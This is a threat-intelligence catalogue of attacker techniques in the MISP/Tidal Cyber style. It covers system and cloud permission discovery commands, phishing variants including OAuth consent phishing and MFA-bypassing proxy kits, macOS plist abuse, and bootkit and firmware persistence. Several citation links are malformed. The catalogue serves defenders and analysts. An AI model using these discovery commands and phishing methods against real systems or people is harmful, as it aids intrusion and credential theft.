Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as <code>net accounts (/domain)</code>, <code>Get-ADDefaultDomainPasswordPolicy</code>, <code>chage -l <username></code>, <code>cat /etc/pam.d/common-password</code>, and <code>pwpolicy getaccountpolicies</code> <sup>[[Superuser Linux Password Policies](https://app.tidalcyber.com/references/c0bbc881-594a-408c-86a2-211ce6279231)]</sup> <sup>[[Jamf User Password Policies](https://app.tidalcyber.com/references/aa3846fd-a307-4be5-a487-9aa2688d5816)]</sup>. Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to discover password policy information (e.g. <code>show aaa</code>, <code>show aaa common-criteria policy all</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>

Password policies can be discovered in cloud environments using available APIs such as <code>GetAccountPasswordPolicy</code> in AWS <sup>[[AWS GetPasswordPolicy](https://app.tidalcyber.com/references/dd44d565-b9d9-437e-a31a-a52c6a21e3b3)]</sup>.

The tag is: misp-galaxy:technique="Password Policy Discovery"

Peripheral Device Discovery

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.<sup>[[Peripheral Discovery Linux](https://app.tidalcyber.com/references/427b3a1b-88ea-4027-bae6-7fb45490b81d)]</sup><sup>[[Peripheral Discovery macOS](https://app.tidalcyber.com/references/2a3c5216-b153-4d89-b0b1-f32af3aa83d0)]</sup> Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.

The tag is: misp-galaxy:technique="Peripheral Device Discovery"

Cloud Groups

Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.

With authenticated access there are several tools that can be used to find permissions groups. The <code>Get-MsolRole</code> PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts <sup>[[Microsoft Msolrole](https://app.tidalcyber.com/references/e36f4e3a-61c9-4fdc-98de-d51a2b3b4865)]</sup><sup>[[GitHub Raindance](https://app.tidalcyber.com/references/321bba10-06c6-4c4f-a3e0-318561fa0fed)]</sup>.

Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command <code>az ad user get-member-groups</code> will list groups associated to a user account for Azure while the API endpoint <code>GET https://cloudidentity.googleapis.com/v1/groups</code>; lists group resources available to a user for Google.<sup>[[Microsoft AZ CLI](https://app.tidalcyber.com/references/cfd94553-272b-466b-becb-3859942bcaa5)]</sup><sup>[[Black Hills Red Teaming MS AD Azure, 2018](https://app.tidalcyber.com/references/48971032-8fa2-40ff-adef-e91d7109b859)]</sup><sup>[[Google Cloud Identity API Documentation](https://app.tidalcyber.com/references/67f2719e-74fd-4bc1-9eeb-07d3095a5191)]</sup> In AWS, the commands ListRolePolicies and ListAttachedRolePolicies allow users to enumerate the policies attached to a role.<sup>[[Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022](https://app.tidalcyber.com/references/af755ba2-97c2-5152-ab00-2e24740f69f3)]</sup>

Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS <code>GetBucketAcl</code> API <sup>[[AWS Get Bucket ACL](https://app.tidalcyber.com/references/1eddbd32-8314-4f95-812a-550904eac2fa)]</sup>. Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.

The tag is: misp-galaxy:technique="Cloud Groups"

Domain Groups

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Commands such as <code>net group /domain</code> of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level groups.

The tag is: misp-galaxy:technique="Domain Groups"

Local Groups

Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

Commands such as <code>net localgroup</code> of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, <code>dscl . -list /Groups</code> on macOS, and <code>groups</code> on Linux can list local groups.

The tag is: misp-galaxy:technique="Local Groups"

Permission Groups Discovery

Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.

Adversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.<sup>[[CrowdStrike BloodHound April 2018](https://app.tidalcyber.com/references/fa99f290-e42c-4311-9f6d-c519c9ab89fe)]</sup>

The tag is: misp-galaxy:technique="Permission Groups Discovery"

Spearphishing Attachment - Duplicate

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary’s payload exploits a vulnerability or directly executes on the user’s system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

The tag is: misp-galaxy:technique="Spearphishing Attachment - Duplicate"

Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.

Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").<sup>[[CISA IDN ST05-016](https://app.tidalcyber.com/references/3cc2c996-10e9-4e25-999c-21dc2c69e4af)]</sup> URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, hxxp://google.com@1157586937.<sup>[[Mandiant URL Obfuscation 2023](https://app.tidalcyber.com/references/b63f5934-2ace-5326-89be-7a850469a563)]</sup>

Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token]([Trend Micro Pawn Storm OAuth 2017(https://app.tidalcyber.com/references/7d12c764-facd-4086-acd0-5c0287344520)]</sup> These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. <sup>[[Microsoft OAuth 2.0 Consent Phishing 2021](https://app.tidalcyber.com/references/393e44fe-cf52-4c39-a79f-f7cdd9d8e16a)]</sup>

The tag is: misp-galaxy:technique="Spearphishing Link - Duplicate"

Spearphishing via Service

Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target’s interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that’s running in an environment. The adversary can then send malicious links or attachments through these services.

A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it’s something they were expecting. If the payload doesn’t work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.

The tag is: misp-galaxy:technique="Spearphishing via Service"

Spearphishing Voice - Duplicate

Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1)) and/or creating a sense of urgency or alarm for the recipient.

All forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,<sup>[[sygnia Luna Month](https://app.tidalcyber.com/references/3e1c2a64-8446-538d-a148-2de87991955a)]</sup><sup>[[CISA Remote Monitoring and Management Software](https://app.tidalcyber.com/references/1ee55a8c-9e9d-520a-a3d3-1d2da57e0265)]</sup> or install adversary-accessible remote management tools ([Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430)) onto their computer.<sup>[[Unit42 Luna Moth](https://app.tidalcyber.com/references/ec52bcc9-6a56-5b94-8534-23c8e7ce740f)]</sup>

Adversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://app.tidalcyber.com/technique/c0f2efd4-bfc8-43da-9859-14446fb8f289) in order to trick users into divulging MFA credentials or accepting authentication prompts.<sup>[[Proofpoint Vishing](https://app.tidalcyber.com/references/7a200d34-b4f3-5036-8582-23872ef27eb1)]</sup>

The tag is: misp-galaxy:technique="Spearphishing Voice - Duplicate"

Phishing

Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.

Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules]([Microsoft OAuth Spam 2022(https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)]</sup><sup>[[Palo Alto Unit 42 VBA Infostealer 2014](https://app.tidalcyber.com/references/c3eccab6-b12b-513a-9a04-396f7b3dcf63)]</sup> Another way to accomplish this is by forging or spoofing<sup>[[Proofpoint-spoof](https://app.tidalcyber.com/references/fe9f7542-bbf0-5e34-b3a9-8596cc5aa754)]</sup> the identity of the sender which can be used to fool both the human recipient as well as automated security tools.<sup>[[cyberproof-double-bounce](https://app.tidalcyber.com/references/4406d688-c392-5244-b438-6995f38dfc61)]</sup>

Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,<sup>[[sygnia Luna Month](https://app.tidalcyber.com/references/3e1c2a64-8446-538d-a148-2de87991955a)]</sup><sup>[[CISA Remote Monitoring and Management Software](https://app.tidalcyber.com/references/1ee55a8c-9e9d-520a-a3d3-1d2da57e0265)]</sup> or install adversary-accessible remote management tools onto their computer (i.e., [User Execution]([Unit42 Luna Moth(https://app.tidalcyber.com/references/ec52bcc9-6a56-5b94-8534-23c8e7ce740f)]</sup>

The tag is: misp-galaxy:technique="Phishing"

Spearphishing Attachment

Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.<sup>[[Sophos Attachment](https://app.tidalcyber.com/references/b4aa5bf9-31db-42ee-93e8-a576ecc00b57)]</sup><sup>[[GitHub Phishery](https://app.tidalcyber.com/references/6da51561-a813-4802-aa84-1b3de1bc2e14)]</sup> The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to craft persuasive and believable lures.

The tag is: misp-galaxy:technique="Spearphishing Attachment"

Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.<sup>[[TrendMictro Phishing](https://app.tidalcyber.com/references/621f1c52-5f34-4293-a507-b58c4084a19b)]</sup><sup>[[PCMag FakeLogin](https://app.tidalcyber.com/references/f652524c-7950-4a8a-9860-0e658a9581d8)]</sup> The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, hxxp://google.com@1157586937.<sup>[[Mandiant URL Obfuscation 2023](https://app.tidalcyber.com/references/b63f5934-2ace-5326-89be-7a850469a563)]</sup>

Adversaries may also link to "web bugs" or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.<sup>[[NIST Web Bug](https://app.tidalcyber.com/references/b4362602-faf0-5b28-a147-b3153da1903f)]</sup>

Adversaries may also be able to spoof a complete website using what is known as a "browser-in-the-browser" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.<sup>[[ZScaler BitB 2020](https://app.tidalcyber.com/references/c2f01a3b-a164-59b7-be5d-5eec4eb69ee5)]</sup><sup>[[Mr. D0x BitB 2022](https://app.tidalcyber.com/references/447f6b34-ac3a-58d9-af96-aa1d947a3e0e)]</sup>

Adversaries can use phishing kits such as EvilProxy and Evilginx2 to proxy the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e)) in addition to their username and password. This may enable the adversary to then bypass MFA via [Web Session Cookie]([Proofpoint Human Factor(https://app.tidalcyber.com/references/143e191f-9175-557b-8fe1-41dbe04867a6)]</sup>

From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to craft persuasive and believable lures.

The tag is: misp-galaxy:technique="Spearphishing Link"

Spearphishing Service

Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.<sup>[[ThreatPost Social Media Phishing](https://app.tidalcyber.com/references/186c1213-d0c5-4eb6-aa0f-0fd61b07a1f7)]</sup> These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target’s interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to craft persuasive and believable lures.

The tag is: misp-galaxy:technique="Spearphishing Service"

Spearphishing Voice

Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1)) and/or creating a sense of urgency or alarm for the recipient.

All forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or "vishing"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.<sup>[[BOA Telephone Scams](https://app.tidalcyber.com/references/ee1abe19-f38b-5127-8377-f13f57f2abcb)]</sup>

Victims may also receive phishing messages that direct them to call a phone number ("callback phishing") where the adversary attempts to collect confidential information.<sup>[[Avertium callback phishing](https://app.tidalcyber.com/references/abeb1146-e5e5-5ecc-9b70-b348fba097f6)]</sup>

Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to tailor pretexts to be even more persuasive and believable for the victim.

The tag is: misp-galaxy:technique="Spearphishing Voice"

Phishing for Information

Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) in that the objective is gathering data from the victim rather than executing malicious code.

All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.

Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.<sup>[[ThreatPost Social Media Phishing](https://app.tidalcyber.com/references/186c1213-d0c5-4eb6-aa0f-0fd61b07a1f7)]</sup><sup>[[TrendMictro Phishing](https://app.tidalcyber.com/references/621f1c52-5f34-4293-a507-b58c4084a19b)]</sup><sup>[[PCMag FakeLogin](https://app.tidalcyber.com/references/f652524c-7950-4a8a-9860-0e658a9581d8)]</sup><sup>[[Sophos Attachment](https://app.tidalcyber.com/references/b4aa5bf9-31db-42ee-93e8-a576ecc00b57)]</sup><sup>[[GitHub Phishery](https://app.tidalcyber.com/references/6da51561-a813-4802-aa84-1b3de1bc2e14)]</sup> Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.<sup>[[Avertium callback phishing](https://app.tidalcyber.com/references/abeb1146-e5e5-5ecc-9b70-b348fba097f6)]</sup>

Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing<sup>[[Proofpoint-spoof](https://app.tidalcyber.com/references/fe9f7542-bbf0-5e34-b3a9-8596cc5aa754)]</sup> the identity of the sender which can be used to fool both the human recipient as well as automated security tools.<sup>[[cyberproof-double-bounce](https://app.tidalcyber.com/references/4406d688-c392-5244-b438-6995f38dfc61)]</sup>

Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules]([Microsoft OAuth Spam 2022(https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)]</sup><sup>[[Palo Alto Unit 42 VBA Infostealer 2014](https://app.tidalcyber.com/references/c3eccab6-b12b-513a-9a04-396f7b3dcf63)]</sup>

The tag is: misp-galaxy:technique="Phishing for Information"

Plist File Modification

Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the <code>info.plist</code> file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple’s Core Foundation DTD. Plist files can be saved in text or binary format.<sup>[[fileinfo plist file description](https://app.tidalcyber.com/references/24331b9d-68af-4db2-887f-3a984b6c5783)]</sup>

Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://app.tidalcyber.com/technique/5e8b76ce-b75f-449c-9d8f-573b1ffdb2bd)) or running additional commands for persistence (ex: [Launch Agent](Launch Daemon(https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) or [Re-opened Applications](https://app.tidalcyber.com/technique/9459a27a-b892-4864-9916-814130bea485)).

For example, adversaries can add a malicious application path to the ~/Library/Preferences/com.apple.dock.plist file, which controls apps that appear in the Dock. Adversaries can also modify the <code>LSUIElement</code> key in an application’s <code>info.plist</code> file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as <code>LSEnvironment</code>, to enable persistence via [Dynamic Linker Hijacking]([wardle chp2 persistence(https://app.tidalcyber.com/references/3684bacb-24cb-4467-b463-d0d3f5075c5c)]</sup><sup>[[eset_osx_flashback](https://app.tidalcyber.com/references/ce6e5a21-0063-4356-a77a-5c5f9fd2cf5c)]</sup>

The tag is: misp-galaxy:technique="Plist File Modification"

Power Settings

Adversaries may impair a system’s ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.<sup>[[Sleep, shut down, hibernate](https://app.tidalcyber.com/references/e9064801-0297-51d0-9089-db58f4811a9f)]</sup>

Adversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.<sup>[[Microsoft: Powercfg command-line options](https://app.tidalcyber.com/references/d9b5be77-5e44-5786-a683-82642b8dd8c9)]</sup><sup>[[systemdsleep Linux](https://app.tidalcyber.com/references/9537f6f9-1521-5c21-b14f-ac459a2d1b70)]</sup>

For example, powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.<sup>[[Two New Monero Malware Attacks Target Windows and Android Users](https://app.tidalcyber.com/references/a797397b-2af7-58b9-b66a-5ded260659f0)]</sup> Adversaries may also extend system lock screen timeout settings.<sup>[[BATLOADER: The Evasive Downloader Malware](https://app.tidalcyber.com/references/53e12ade-99ed-51ee-b5c8-32180f144658)]</sup> Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.<sup>[[CoinLoader: A Sophisticated Malware Loader Campaign](https://app.tidalcyber.com/references/83469ab3-0199-5679-aa25-7b6885019552)]</sup>

Aware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.<sup>[[Condi-Botnet-binaries](https://app.tidalcyber.com/references/a92b0d6c-b3e8-56a4-b1b4-1d117e59db84)]</sup>

The tag is: misp-galaxy:technique="Power Settings"

Bootkit

Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). <sup>[[Mandiant M Trends 2016](https://app.tidalcyber.com/references/f769a3ac-4330-46b7-bed8-61697e22cd24)]</sup> The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. <sup>[[Lau 2011](https://app.tidalcyber.com/references/fa809aab-5051-4f9c-8e27-b5989608b03c)]</sup>

The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.

The tag is: misp-galaxy:technique="Bootkit"

Component Firmware

Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://app.tidalcyber.com/technique/4050dbda-5cb0-4bd6-8444-841e55611f3a) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.

Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.

The tag is: misp-galaxy:technique="Component Firmware"

ROMMONkit

Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. <sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>

ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://app.tidalcyber.com/technique/6f2186f3-c798-46e8-a26f-ae033822837b), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.

The tag is: misp-galaxy:technique="ROMMONkit"

System Firmware

Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. <sup>[[Wikipedia BIOS](https://app.tidalcyber.com/references/0c4a2cb3-d663-47ee-87af-c5e9e68fe15f)]</sup> <sup>[[Wikipedia UEFI](https://app.tidalcyber.com/references/681c6a57-76db-410b-82d6-4e614bcdb6e0)]</sup> <sup>[[About UEFI](https://app.tidalcyber.com/references/2e6fe82c-d90f-42b6-8247-397ab8823c7c)]</sup>

System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.

The tag is: misp-galaxy:technique="System Firmware"

TFTP Boot

Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.

Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) and may result in the network device running a modified image. <sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>

The tag is: misp-galaxy:technique="TFTP Boot"

Pre-OS Boot

Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.<sup>[[Wikipedia Booting](https://app.tidalcyber.com/references/6d9c72cb-6cda-445e-89ea-7e695063d49a)]</sup>

Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.

The tag is: misp-galaxy:technique="Pre-OS Boot"

Process Discovery

